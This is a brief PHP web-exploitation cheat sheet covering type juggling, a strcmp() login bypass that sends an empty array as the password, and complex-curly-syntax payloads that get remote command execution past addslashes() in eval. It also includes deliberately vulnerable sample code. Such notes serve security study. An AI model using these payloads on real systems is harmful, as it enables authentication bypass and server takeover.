PHP

Here are some tricks to try in PHP web applications.

Type Juggling

The following image shows the result of comparing types with the == operator.

Resources

• Hacktricks
• Medium Blog
• Owasp PDF

strcmp(): Vulnerable function

• Vulnerable code

<?php 
if(strcmp($_POST['password'], $PASS ) == 0)
?>

• In this comparison a string is expected (Default from HTTP), but we can send an empty array: password[]= in the form.
• Then the function strcmp(array(),$PASS) will return NULL
• As we seen in the image, NULL == 0 -> True
• Login bypass!

Eval

Eval'd code will be executed, but sometimes we have to bypass some functions that will escape our injection.

addslashes()

• addslashes() tries to escape some characters. By definition on the PHP page

Quote

Returns a string with backslashes added before characters that need to be escaped. These characters are:

• single quote (')
• double quote (")
• backslash (\)
• NUL (the NUL byte)

• What we can do is try to play around the valid characters with something known as "Complex Syntax" or "Complex Curly Syntax (CCS)"

  • For example, if we have the following code:

  <?php 
      $var = addslashes($_GET['param']);
      eval(function("bla".$var."blah"));
  ?>
  

  Info

  If we put in param something to try RCE ( like ); system(<RCE>) ) we find that due to addslashes we can't pass arguments to the system function.

  • So, we need to use CCS to bypass this, below are 2 examples

    <?php
    # Using chr to avoid using blank spaces
    ${(system)(ls.chr(32).chr(45).la)}
    # Using another GET parameter to cast the argument to String type
    ${system($_GET[1])}&1=whoami
    # Or with eval (taken from https://www.programmersought.com/article/30723400042/)
    ?str=${eval($_GET[1])}&1=phpinfo();
    ?>